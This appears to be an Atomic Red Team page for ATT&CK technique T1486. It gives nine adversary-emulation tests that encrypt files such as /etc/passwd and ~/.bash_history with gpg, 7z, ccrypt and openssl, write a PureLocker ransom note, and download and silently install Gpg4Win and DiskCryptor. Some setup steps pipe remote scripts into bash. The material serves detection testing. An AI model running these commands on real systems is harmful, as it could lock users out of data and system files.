T1486 - Data Encrypted for Impact

Description from ATT&CK

Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.(Citation: US-CERT Ransomware 2016)(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017)(Citation: US-CERT SamSam 2018) In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted (and often renamed and/or tagged with specific file markers). Adversaries may need to first employ other behaviors, such as [File and Directory Permissions Modification](https://attack.mitre.org/techniques/T1222) or [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529), in order to unlock and/or gain access to manipulate these files.(Citation: CarbonBlack Conti July 2020) In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.(Citation: US-CERT NotPetya 2017) To maximize impact on the target organization, malware designed for encrypting data may have worm-like features to propagate across a network by leveraging other attack techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017) Encryption malware may also leverage [Internal Defacement](https://attack.mitre.org/techniques/T1491/001), such as changing victim wallpapers, or otherwise intimidate victims by sending ransom notes or other messages to connected printers (known as "print bombing").(Citation: NHS Digital Egregor Nov 2020) In cloud environments, storage objects within compromised accounts may also be encrypted.(Citation: Rhino S3 Ransomware Part 1)

Atomic Tests


Atomic Test #1 - Encrypt files using gpg (FreeBSD/Linux)

Uses gpg to encrypt a file

Supported Platforms: Linux

auto_generated_guid: 7b8ce084-3922-4618-8d22-95f996173765

Inputs:

| Name | Description | Type | Default Value | |——|————-|——|—————| | pwd_for_encrypted_file | the password that you want for the encrypted file | string | passwd| | encrypted_file_path | path to the encrypted file | path | /tmp/passwd.gpg| | input_file_path | path to the file that you want to encrypt | path | /etc/passwd| | encryption_alg | encryption algorithm of the file | string | AES-256|

Attack Commands: Run with
1
sh
!

1
echo "#{pwd_for_encrypted_file}" | $which_gpg --batch --yes --passphrase-fd 0 --cipher-algo #{encryption_alg} -o #{encrypted_file_path} -c #{input_file_path}

Cleanup Commands:

1
rm #{encrypted_file_path}

Dependencies: Run with
1
bash
!

Description: Finds where gpg is located
Check Prereq Commands:
1
which_gpg=`which gpg`
Get Prereq Commands:
1
(which pkg && pkg install -y gnupg)||(which yum && yum -y install epel-release gpg)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y gpg)



Atomic Test #2 - Encrypt files using 7z (FreeBSD/Linux)

Uses 7z to encrypt a file

Supported Platforms: Linux

auto_generated_guid: 53e6735a-4727-44cc-b35b-237682a151ad

Inputs:

| Name | Description | Type | Default Value | |——|————-|——|—————| | pwd_for_encrypted_file | the password that you want for the encrypted file | string | passwd| | encrypted_file_path | path to the encrypted file | path | /tmp/passwd.zip| | input_file_path | path to the file that you want to encrypt | path | /etc/passwd|

Attack Commands: Run with
1
sh
!

1
$which_7z a -p#{pwd_for_encrypted_file} #{encrypted_file_path} #{input_file_path}

Cleanup Commands:

1
2
$which_7z e #{encrypted_file_path}
rm #{encrypted_file_path}

Dependencies: Run with
1
bash
!

Description: Finds where 7z is located
Check Prereq Commands:
1
which_7z=`which 7z`
Get Prereq Commands:
1
(which pkg && pkg install -y 7-zip)



Atomic Test #3 - Encrypt files using ccrypt (FreeBSD/Linux)

Attempts to encrypt data on target systems as root to simulate an inturruption authentication to target system. If root permissions are not available then attempts to encrypt data within user’s home directory.

Supported Platforms: Linux

auto_generated_guid: 08cbf59f-85da-4369-a5f4-049cffd7709f

Inputs:

| Name | Description | Type | Default Value | |——|————-|——|—————| | cped_file_path | path where you want your copied file to be | path | /tmp/passwd| | root_input_file_path | path to the file that you want to be encrypted if you are root user | path | /etc/passwd| | user_input_file_path | path to file that you want to be encrypted if you are normal user | path | ~/.bash_history| | impact_command | command to show impact of encryption | string | sudo su|

Attack Commands: Run with
1
sh
!

1
if [ $USER == "root" ]; then $which_ccencrypt #{root_input_file_path}; file #{root_input_file_path}.cpt; #{impact_command}; else $which_ccencrypt #{user_input_file_path}; file #{user_input_file_path}.cpt; #{impact_command}; fi

Cleanup Commands:

1
if [ $USER == "root" ]; then mv #{cped_file_path} #{root_input_file_path}; else cp #{cped_file_path} #{user_input_file_path}; fi

Dependencies: Run with
1
sh
!

Description: Finds where ccencrypt and ccdecrypt is located and copies input file
Check Prereq Commands:
1
2
3
which_ccencrypt=`which ccencrypt`
which_ccdecrypt=`which ccdecrypt`
if [ $USER == "root" ]; then cp #{root_input_file_path} #{cped_file_path}; else cp #{user_input_file_path} #{cped_file_path}; fi
Get Prereq Commands:
1
(which pkg && pkg install -y ccript)||(which yum && yum -y install epel-release ccrypt)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y ccrypt)



Atomic Test #4 - Encrypt files using openssl (FreeBSD/Linux)

Uses openssl to encrypt a file

Supported Platforms: Linux

auto_generated_guid: 142752dc-ca71-443b-9359-cf6f497315f1

Inputs:

| Name | Description | Type | Default Value | |——|————-|——|—————| | private_key_path | path to the private key | path | /tmp/key.pem| | public_key_path | path to the public key | path | /tmp/pub.pem| | encryption_bit_size | size of the bit of encryption | integer | 2048| | encrypted_file_path | path to the encrypted file | path | /tmp/passwd.zip| | input_file_path | path to the file that you want to encrypt | path | /etc/passwd|

Attack Commands: Run with
1
sh
!

1
2
3
$which_openssl genrsa -out #{private_key_path} #{encryption_bit_size}
$which_openssl rsa -in #{private_key_path} -pubout -out #{public_key_path}
$which_openssl rsautl -encrypt -inkey #{public_key_path} -pubin -in #{input_file_path} -out #{encrypted_file_path}

Cleanup Commands:

1
2
$which_openssl rsautl -decrypt -inkey #{private_key_path} -in #{encrypted_file_path}
rm #{encrypted_file_path}

Dependencies: Run with
1
bash
!

Description: Finds where openssl is located
Check Prereq Commands:
1
which_openssl=`which openssl`
Get Prereq Commands:
1



Atomic Test #5 - PureLocker Ransom Note

building the IOC (YOUR_FILES.txt) for the PureLocker ransomware https://www.bleepingcomputer.com/news/security/purelocker-ransomware-can-lock-files-on-windows-linux-and-macos/

Supported Platforms: Windows

auto_generated_guid: 649349c7-9abf-493b-a7a2-b1aa4d141528

Attack Commands: Run with
1
command_prompt
! Elevation Required (e.g. root or admin)

echo T1486 - Purelocker Ransom Note > %USERPROFILE%\Desktop\YOUR_FILES.txt

Cleanup Commands:

del %USERPROFILE%\Desktop\YOUR_FILES.txt >nul 2>&1



Atomic Test #6 - Encrypt files using 7z utility - macOS

This test encrypts the file(s) using the 7z utility

Supported Platforms: macOS

auto_generated_guid: 645f0f5a-ef09-48d8-b9bc-f0e24c642d72

Inputs:

| Name | Description | Type | Default Value | |——|————-|——|—————| | file_password | Password to be provided for archiving the file | string | ARTPass| | encrypted_file_name | Name of the archive to be created | string | ARTArchive.7z| | input_file_path | Path to the file that you want to encrypt | path | ~/test.txt|

Attack Commands: Run with
1
sh
!

1
7z a -p #{file_password} -mhe=on #{encrypted_file_name} #{input_file_path}

Cleanup Commands:

1
rm #{encrypted_file_name}

Dependencies: Run with
1
sh
!

Description: Check if 7z command exists on the machine
Check Prereq Commands:
1
which 7z
Get Prereq Commands:
1
2
3
echo Installing 7z, using brew
/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"
brew install p7zip



Atomic Test #7 - Encrypt files using openssl utility - macOS

This test encrypts the file(s) using the openssl utility

Supported Platforms: macOS

auto_generated_guid: 1a01f6b8-b1e8-418e-bbe3-78a6f822759e

Inputs:

| Name | Description | Type | Default Value | |——|————-|——|—————| | encryption_option | Specifiy the required encryption option | string | -pbkdf2| | input_file_path | Path to the file that you want to encrypt | path | ~/test.txt| | output_file_name | Path to the file that you want to encrypt | string | ARTFile|

Attack Commands: Run with
1
sh
!

1
openssl enc #{encryption_option} -in #{input_file_path} -out #{output_file_name}

Cleanup Commands:

1
rm #{output_file_name}



Atomic Test #8 - Data Encrypted with GPG4Win

Gpg4win is a Windows tool (also called Kleopatra which is the preferred certificate manager) that uses email and file encryption packages for symmetric encryption. It is used by attackers to encrypt disks. User will need to add pass phrase to encrypt file as automation is not allowed under newer versions.

Supported Platforms: Windows

auto_generated_guid: 4541e2c2-33c8-44b1-be79-9161440f1718

Inputs:

| Name | Description | Type | Default Value | |——|————-|——|—————| | GPG_Exe_Location | Path of the GPG program | path | C:\Program Files (x86)\GnuPG\bin\gpg.exe| | File_to_Encrypt_Location | Path of File | path | $env:temp\test.txt|

Attack Commands: Run with
1
powershell
!

1
cmd /c '#{GPG_Exe_Location}' -c '#{File_to_Encrypt_Location}'

Cleanup Commands:

1
remove-item '#{File_to_Encrypt_Location}.gpg' -force -erroraction silentlycontinue | out-null

Dependencies: Run with
1
powershell
!

Description: GPG must exist at (#{GPG_Exe_Location})
Check Prereq Commands:
1
if (test-path '#{GPG_Exe_Location}'){exit 0} else {exit 1}
Get Prereq Commands:
1
2
3
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
invoke-webrequest "https://files.gpg4win.org/gpg4win-4.1.0.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\gpginstall.exe"
cmd /c "PathToAtomicsFolder\..\ExternalPayloads\gpginstall.exe" /S



Atomic Test #9 - Data Encrypt Using DiskCryptor

DiskCryptor, an open source encryption utility, can be exploited by adversaries for encrypting all disk partitions, including system partitions. This tool was identified in a ransomware campaign, as reported on https://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/. The documentation for DiskCryptor can be found at https://github.com/DavidXanatos/DiskCryptor. During the installation process, running dcrypt.exe starts the encryption console. It’s important to note that a system reboot is necessary as part of the installation.

Supported Platforms: Windows

auto_generated_guid: 44b68e11-9da2-4d45-a0d9-893dabd60f30

Inputs:

| Name | Description | Type | Default Value | |——|————-|——|—————| | dcrypt_exe | The dcrypt.exe executable from dcrypt_setup.exe | path | dcrypt.exe|

Attack Commands: Run with
1
command_prompt
! Elevation Required (e.g. root or admin)

""%PROGRAMFILES%\dcrypt"\#{dcrypt_exe}"

Dependencies: Run with
1
powershell
!

Description: dcrypt_setup will be installed at specified location (#{dcrypt_exe})
Check Prereq Commands:
1
if (Test-Path "${env:ProgramFiles}/dcrypt/#{dcrypt_exe}") {exit 0} else {exit 1}
Get Prereq Commands:
1
2
3
4
5
Write-Host Downloading DiskCryptor installer
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://github.com/DavidXanatos/DiskCryptor/releases/download/1.1.846.118/dcrypt_setup_1.1.846.118.exe" -OutFile      "PathToAtomicsFolder\..\ExternalPayloads\dcrypt_setup_1.1.846.118.exe"
Write-Host Install DiskCryptor
Start-Process "PathToAtomicsFolder\..\ExternalPayloads\dcrypt_setup_1.1.846.118.exe" -Wait -ArgumentList "/s"